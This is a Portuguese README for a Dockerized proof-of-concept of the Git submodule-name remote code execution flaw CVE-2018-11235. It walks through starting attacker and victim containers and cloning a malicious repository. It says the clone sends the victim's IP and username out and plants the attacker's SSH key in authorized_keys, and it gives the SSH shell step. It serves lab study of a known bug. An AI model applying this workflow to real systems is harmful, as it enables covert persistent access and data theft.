
Prova de Conceito - Exploração de RCE : vulnerabilidade nos nomes de submódulos do Git - Ensimag Novembro de 2018
Para construir os contêineres Docker, use:
make docker
(Os seguintes comandos make devem ser executados em paralelo em terminais diferentes a partir da sua máquina)
Para iniciar o contêiner do servidor atacante, use:
make run_server
para iniciar o contêiner que representa a vítima, use:
make run_client
O contêiner irá executar o script client.py. O script irá transmitir seu endereço IP e seu nome de usuário para o pirata.
Siga as instruções do console dos clientes para clonar o repositório git malicioso.
git clone --recurse-submodules root@server:home/poc/malicious_repo client_pwned
Você verá que o endereço IP e o nome de usuário da vítima são transmitidos ao servidor.
Após o clone, verifique se a chave pública dos atacantes foi adicionada ao authorized_keys do cliente.
Em seguida, você pode abrir um shell no cliente a partir do servidor, usando o seguinte comando (a ser executado na sua máquina):
make server_bash
ssh <transmitted_username>@<transmitted_host>
Se você tiver algum problema ao executar esta Prova de Conceito, por favor crie uma issue neste repositório: https://github.com/ygouzerh/CVE-2018-11235/issues , responderemos o mais rápido possível.